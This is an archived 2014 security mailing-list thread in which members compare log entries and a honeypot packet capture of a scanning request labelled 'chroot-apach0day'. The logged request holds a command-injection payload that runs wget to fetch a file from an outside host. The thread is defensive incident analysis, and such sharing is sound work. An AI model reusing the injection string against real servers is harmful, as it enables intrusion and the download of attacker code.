PaulDotCom mailing list archives

Previous By Date Next
Previous By Thread Next

Re: [Security Weekly] apache chroot 0day?

From: Ben Jackson <bbj () mayhemiclabs com>
Date: Mon, 28 Jul 2014 13:56:40 -0400
Nice find Robin! This hit each and everyone one of my honeypots. Same
request. Really weird.

Here is what TShark shows me off one of my pcaps:

----
Node 0: 162.253.66.77:41790
Node 1: LOLHONEYPOT:80
139
GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day;
HTTP/1.0
User-agent: chroot-apach0day
Referrer: /xA/x0a/x05



300
HTTP/1.1 200 OK
Date: Mon, 28 Jul 2014 05:38:48 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Wed, 22 May 2013 06:24:30 GMT
ETag: "2e2f11-b1-4dd489e4be380"
Accept-Ranges: bytes
Content-Length: 177
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<html><body><h1>It work
154
s!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added,
yet.</p>
</body></html>

----

Our winner appears to be a shared hosting provider:

27176 | 162.253.66.0/24 | DATAWAGON | US | DATAWAGON.NET | DATAWAGON LLC



On Mon, Jul 28, 2014 at 11:03 AM, xgermx <xgermx () gmail com> wrote:


Seeing hits from 16X.XXX.XX.X7
Based on the name, I'd have to guess reflective DNS DDoS
Registrant phone for proxypipe.com is +1.8557769900 which actually works
and an IVR picks up :) I selected option 2 for tech support to complain
that the other kidz are laughing at my lame apache 0day but, my call was
shunted.

xgermx


On Mon, Jul 28, 2014 at 10:30 AM, Frank Michael <frankcmichael () gmail com>
wrote:


Various sources confirming the same thing for other sites. All on 7/28.
Keep an eye open.

On Jul 28, 2014, at 5:09 AM, Robin Wood <robin@digi.ninja> wrote:

I've got a site that was scanned this morning by a tool that left these
entries in the logs:

    [HTTP_USER_AGENT] => chroot-apach0day
    [HTTP_REFERRER] => /xA/x0a/x05
    [REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%
20proxypipe.com/apach0day;

Anyone recognise it? That user agent isn't coming up in google searches.

Robin

_______________________________________________

Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com


_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com




_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com





-- 
Ben Jackson - Mayhemic Labs
bbj () mayhemiclabs com - http://www.mayhemiclabs.com - +1-508-296-0267
"Assume that what is in the power of one man to do, is in the power of
another"

_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
Previous By Date Next
Previous By Thread Next

Current thread: